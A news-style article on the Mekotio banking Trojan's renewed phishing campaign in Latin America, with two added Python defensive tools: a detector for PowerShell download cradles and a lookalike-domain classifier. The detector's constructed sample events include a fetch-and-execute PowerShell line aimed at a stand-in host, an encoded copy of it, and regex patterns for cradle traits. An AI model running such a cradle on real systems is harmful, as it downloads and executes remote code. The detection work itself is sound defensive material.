Mekotio Banking Trojan Returns with Stealthy and Evasive Techniques

Mekotio is an older modular banking Trojan that has targeted Latin American countries and has recently made a comeback with stealthy and evasive techniques.

According to Check Point researchers, over 100 attacks have been detected in recent weeks using the new technique. The infection starts with a phishing email that carries either a link to a zip file or a zip archive as an attachment.

The main characteristic of banking Trojans such as Mekotio is a modular design, which gives the attackers the ability to change just a small part of the whole to avoid detection.

How Mekotio’s new attack flow is carried out

The infection starts with a phishing email containing a link to a zip archive, which lures the victim into downloading and extracting the zip’s contents.

If the victim runs the extracted content, a malicious batch script executes a “PowerShell download cradle”, which downloads a PowerShell script and runs it in memory.

The PowerShell script checks whether the target is located in Latin America and makes sure it is not running in a virtual machine. It then sets up persistence in the victim’s operating system by downloading a secondary zip archive.
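The batch-to-PowerShell download-cradle stage described above leaves a recognisable trace in process-creation telemetry. The following is an added detection example, not code from the article or from Check Point. It runs over constructed Sysmon-style events (the command lines, file paths and the stage2.example.invalid URL are made up for the example) and flags PowerShell children of a batch host whose command line fetches a script over HTTP and executes it in memory, including when the command is passed base64-encoded.

```python
import base64
import re

# Regexes for the traits of a PowerShell download cradle as the article describes it:
# a script fetched over HTTP and executed in memory, typically with a hidden window.
INDICATORS = {
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I),
    "in_memory_exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (a UTF-16LE script)
ENCODED_ARG = re.compile(r"-e(?:nc|ncodedcommand|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
BATCH_HOSTS = {"cmd.exe"}  # the article's first stage is a batch script, which cmd.exe runs


def decode_encoded_command(command_line):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    match = ENCODED_ARG.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Score one process-creation event and return the matched indicators plus a verdict."""
    command_line = event["CommandLine"]
    hits = []
    text = command_line
    decoded = decode_encoded_command(command_line)
    if decoded is not None:
        hits.append("encoded_command")
        text = command_line + " " + decoded  # scan the decoded script as well
    for name, pattern in INDICATORS.items():
        if pattern.search(text):
            hits.append(name)
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    child = event["Image"].rsplit("\\", 1)[-1].lower()
    if child == "powershell.exe" and parent in BATCH_HOSTS:
        hits.append("spawned_by_batch_host")
    # A cradle needs both a fetch and an in-memory execution; the other hits only raise the score
    is_cradle = "download_cradle" in hits and "in_memory_exec" in hits
    return {"hits": hits, "score": len(hits), "suspicious": is_cradle}


# Constructed sample events in Sysmon Event ID 1 style; none of this is real telemetry.
SAMPLE_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://stage2.example.invalid/s.ps1')"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": POWERSHELL,
     "CommandLine": 'powershell.exe -nop -w hidden -c "' + SAMPLE_STAGE2 + '"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": POWERSHELL,
     "CommandLine": "powershell.exe -enc "
                    + base64.b64encode(SAMPLE_STAGE2.encode("utf-16-le")).decode("ascii")},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": POWERSHELL,  # benign admin script
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": POWERSHELL,  # batch child, no cradle
     "CommandLine": "powershell.exe Get-Date"},
]


def triage(events):
    """Return the command lines of every event the detector flags as a download cradle."""
    return [e["CommandLine"] for e in events if analyze_event(e)["suspicious"]]


if __name__ == "__main__":
    for sample in SAMPLE_EVENTS:
        result = analyze_event(sample)
        print(result["suspicious"], result["score"], result["hits"])
```

The verdict deliberately requires both a fetch and an in-memory execution: `-ExecutionPolicy Bypass` or a hidden window on its own is common in legitimate administration and only raises the score for triage, while a batch host spawning PowerShell is recorded as context rather than treated as proof.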

Check Point researchers believe that the main cybercrime groups behind the new campaigns operate from Brazil and that they collaborated with Spanish gangs, recently arrested, to distribute the malware. The arrests did not stop the main groups; they only halted the activity of the Spanish gangs.

How to mitigate against banking Trojans like Mekotio

Threat actors continue to adopt evasive techniques to avoid detection, and social engineering tricks that lure victims into giving up their online banking data are becoming more pervasive. The most important advice, therefore, is for users not to click on links that come from an unknown source.

Also beware of lookalike domains, spelling errors in emails or site addresses, and unfamiliar email senders, especially if they prompt for unusual actions.
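The advice about lookalike domains and misspelt site addresses can be turned into a mechanical check. The following is an added example, not code from the article: the allowlist (bancoexemplo.com, exemplobank.com.br) and the confusable-character tables are constructed for it. It normalises a host name (punycode back to Unicode, accents stripped, digits folded to the letters they imitate), then compares each label with the trusted brand label to catch a brand reused under another TLD or as a subdomain of a stranger, homoglyph substitutions, and typos within two edits.

```python
import unicodedata

# Constructed allowlist of the domains a user actually banks with; not real institutions.
TRUSTED_DOMAINS = ["bancoexemplo.com", "exemplobank.com.br"]

# Single characters commonly swapped for lookalikes, folded before comparison
CONFUSABLE_CHARS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "8": "b"})
# Letter pairs that render like a single letter in many fonts
CONFUSABLE_PAIRS = [("rn", "m"), ("vv", "w"), ("cl", "d")]
MAX_TYPO_DISTANCE = 2


def normalize(domain):
    """Lower-case, strip a leading www., and turn punycode (xn--) labels back into Unicode."""
    host = domain.strip().rstrip(".").lower()
    if host.startswith("www."):
        host = host[4:]
    if "xn--" in host:
        try:
            host = host.encode("ascii").decode("idna")
        except UnicodeError:
            pass
    return host


def fold(label):
    """Strip accents and map confusable characters so lookalikes collapse to one form."""
    decomposed = unicodedata.normalize("NFKD", label)
    ascii_like = "".join(c for c in decomposed if not unicodedata.combining(c))
    folded = ascii_like.translate(CONFUSABLE_CHARS)
    for pair, single in CONFUSABLE_PAIRS:
        folded = folded.replace(pair, single)
    return folded


def edit_distance(a, b):
    """Optimal string alignment distance: insert, delete, substitute or swap adjacent characters."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def classify(domain, trusted=TRUSTED_DOMAINS):
    """Return 'trusted', 'lookalike' (with the reason and the brand imitated) or 'unknown'."""
    host = normalize(domain)
    labels = host.split(".")
    for t in trusted:
        brand = t.split(".")[0]  # the brand label, e.g. "bancoexemplo"
        if host == t or host.endswith("." + t):
            return {"domain": host, "verdict": "trusted", "matches": t, "reason": "exact or subdomain"}
        for label in labels:
            if label == brand:
                reason = "brand label reused under another TLD or inside a stranger's domain"
                return {"domain": host, "verdict": "lookalike", "matches": t, "reason": reason}
            if fold(label) == fold(brand):
                return {"domain": host, "verdict": "lookalike", "matches": t, "reason": "homoglyph"}
            # the length guard keeps short brand names from matching unrelated words
            if len(brand) >= 6 and edit_distance(fold(label), fold(brand)) <= MAX_TYPO_DISTANCE:
                return {"domain": host, "verdict": "lookalike", "matches": t, "reason": "typosquat"}
    return {"domain": host, "verdict": "unknown", "matches": None, "reason": "not on the allowlist"}


if __name__ == "__main__":
    # constructed candidates: a real subdomain, digit-for-letter, rn-for-m, swapped letters,
    # the brand as a subdomain of a stranger, and an accented IDN variant
    for candidate in ["login.bancoexemplo.com", "bancoexemp1o.com", "bancoexernplo.com",
                      "bancoexemlpo.com", "bancoexemplo.com.secure-login.example",
                      "bancoexémplo.com".encode("idna").decode("ascii")]:
        print(classify(candidate))
```

An "unknown" verdict is not a clean bill of health; it only means the name neither matches nor imitates an allowlisted bank, which is exactly the class of link the article says users should not click when it arrives from an unfamiliar sender.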
